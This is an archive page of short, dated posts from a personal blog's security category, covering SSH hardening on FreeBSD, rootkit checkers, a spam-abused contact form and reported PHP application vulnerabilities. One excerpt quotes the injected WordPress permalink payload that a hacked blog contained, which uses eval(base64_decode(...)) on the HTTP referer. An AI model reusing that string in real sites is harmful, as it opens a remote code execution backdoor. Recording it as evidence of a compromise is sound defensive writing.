March 8, 2011 Posted in Security
This is for Windows client, please refer to this page for FreeBSD workstation.
Key Based Authentication, step by step
1. Download PuTTYgen (on Windows), generate private/public key pair.
Read More
July 23, 2010 Posted in Security
When I visited one of my sites, I got a page with only the bold and big text:
Welcome to Nginx!
It looked like my site was hacked, actually I was pretty sure about it at that moment. I almost wanted to roll out my backup, fortunately it’s back to normal 20 minutes later, then I thought it might be my computer’s problem. After some digging, it turned out to be my ISP’s problem, somehow my ISP treated my site as an invalid domain and displayed their own search engine (evil), but their own site didn’t work, hence the default page from their proxy server.
March 5, 2010 Posted in Security
I just changed my SSH authentication from password to key-based. If you are using password authentication, I strongly suggest you change it, it’s a must, the setup is also very easy, there is no any reasons you don’t do this. With all kinds of buggy programs and scripts, our servers are much much weaker than we thought.
Edit: Wrote a step by step guide for easy reference.
September 5, 2009 Posted in Security
I just found that my two wordpress blogs were hacked, the permanent link structure was changed to:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
This caused the individual posts couldn’t be accessed.
I don’t know how this was hacked, and what other damages were caused. For now, a urgent solution would be protecting wp-admin directory.
I have seen some other hacked blogs, I strongly suggest you take actions immediately. The above might not be a good solution, but should be helpful.
March 30, 2009 Posted in Security
When I was restarting Apache after installed a new PHP module, I found that httpd.conf was missing, that was scary! I have absolutely no idea how this happened, the only possible reason is that I deleted it by accident. Read More
November 22, 2008 Posted in Security
PHPClassifieds 7.5 has a SQL injection vulnerability, the detailed how-to was posted publicly, which caused many classifieds websites hacked. The fix is here. Read More
December 31, 2005 Posted in FTP, Security
After I changed the ssh port, combined with the changes of net.inet.tcp.blackhole and net.inet.udp.blackhole, now the server is completely free of ssh login attempts. I realized these two changes should be made together, it doesn’t make much sense to change only one of them. For example, if only change the port, the server will still respond to the port scan, it very probably gets more scan activity. What if only changed the system varibles? Since the ports of common services are the main target, the evil people still can easily find the ports to attack. Read More
December 26, 2005 Posted in Security
I used default port number 22 for sshd, the server got lots of login attempts every day which left thousands of lines in daily security run output. Read More
November 21, 2005 Posted in Security
On the FreeBSD security mailing list, there is a post about a compromised box which got many interesting replies: Need urgent help regarding security
November 16, 2005 Posted in Security
A simple contact form on my website was abused to send spams. I received weird messages sent from the contact form in the past two weeks, I thought it was just from some boring persons, and didn’t pay attention to it until I got some messages bounced back from other servers. After checked the mail queue, I was shocked that there were still a few emails with a very long recipient list.
Here is my original code:
Read More
November 5, 2005 Posted in Security
Google seems to like this blog a lot, new posts were picked up and ranked in the top 10 within a couple of days…simply amazing to me. Although this blog has quite a few keywords with great ranking such as “FreeBSD server”, the most searched term is “phpBB hack”. Several visitors even came here with “how to hack phpBB”. Read More
October 30, 2005 Posted in Security
Cordeiro posted the following message on the FreeBSD security list. I didn’t test it (I don’t have testing server).
…don’t use chkrootkit 0.46 on production machines.
The “chkproc” process sends a SIGXFSZ (25) signal to init,
that interprets this signal as a “disaster” and reboots
after a 30s sleep.
I tested chkrootkit(0.45) and Rootkit Hunter before. I prefer Rootkit Hunter.
August 17, 2005 Posted in Security
I have tried chkrootkit, and I think it’s a very good tool. The book “Mastering FreeBSD and OpenBSD Security”, a security bible to me, only mentioned Rootkit Hunter, so I decide to give it a try. Read More
August 16, 2005 Posted in Security
There is a new vulnerability in Awstats 6.4, detailed explanation is here. The new development version 6.5 has addressed this issue, but not available yet in ports. Awstats 6.4 has been marked forbidden in the ports, “make install” will display the following message, which is different from the portaudit error: Read More
August 13, 2005 Posted in Security
chkrootkit (official website is very slow) is a tool for checking root kits, it’s very easy to install and use. Read More